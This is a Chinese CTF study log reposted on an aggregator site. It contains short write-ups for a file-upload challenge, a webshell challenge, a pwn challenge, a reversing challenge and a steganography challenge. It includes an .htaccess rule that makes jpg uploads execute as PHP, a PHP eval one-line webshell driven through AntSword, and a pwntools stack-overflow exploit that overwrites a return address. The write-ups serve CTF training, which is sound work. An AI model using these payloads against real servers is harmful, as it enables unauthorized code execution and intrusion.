主页 > 开源代码  > 

2.19学习记录

2.19学习记录
Web easyupload3.0

这是一道构造.htaccess文件的传马 如下:

<FilesMatch "jpg"> SetHandler application/x-httpd-php </FilesMatch>

.htaccess文件可以作为一个解释器,可以将传进去的图片马改为php马上传之后再传个图片马,之后就可以蚁剑了

[极客大挑战 2019]Knife

根据提示构造木马

/?<?php eval($_POST["Syc"]);?>

之后用蚁剑连接即可flag在根目录下

pwn [BUUCTF]bjdctf_2020_babystack

先用exe看一下64位的exe文件,用ida查看主调函数分析代码发现在read处存在栈溢出 exp:

from pwn import * io=remote('node2.anna.nssctf ',28733) io.sendlineafter("name:",b'100') payload=b'a'*(0x10+8)+p64(0x4006E6) io.sendlineafter("name?",payload) io.interactive() re [SWPUCTF 2021 新生赛]非常简单的逻辑题

题目

flag = 'xxxxxxxxxxxxxxxxxxxxx' s = 'wesyvbniazxchjko1973652048@$+-&*<>' result = '' for i in range(len(flag)): s1 = ord(flag[i])//17 s2 = ord(flag[i])%17 result += s[(s1+i)%34]+s[-(s2+i+1)%34] print(result) # result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'

题目的意思是在for循环中,对flag的ASCII值取整并赋给s1,对flag的ASCII值取余并赋给s2,在进行一个加密算法赋给result。 根据查询ai,分析思路:先在一定范围的ASCII值中,取整取余,分别赋给s1,s2 再定义一个函数命名为res,让其等于加密算法,此时的加密算法i已经不能再用i表示,替换成num 再写一个if判断,res与result的两两分组的值是否相等 exp:

flag = '' s = 'wesyvbniazxchjko1973652048@$+-&*<>' result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i' res = '' num = 0 for j in range(0,len(result),2): for i in range(255): s1 = i//17 s2 = i%17 res = s[(s1+num)%34]+s[-(s2+num+1)%34] if res == result[j:j+2]: flag += chr(i) num += 1 print(flag)

misc [NISACTF 2022]huaji?

用010查看附件发现是个jfif文件用随波逐流一把梭了 发现含有一个zip,内容是叫作flag的文档用binwalk分出来,压缩包是加密的 得到的jpg查看一下exif,发现可疑信息标记处猜一波是密码,结果还真是

标签:

2.19学习记录由讯客互联开源代码栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“2.19学习记录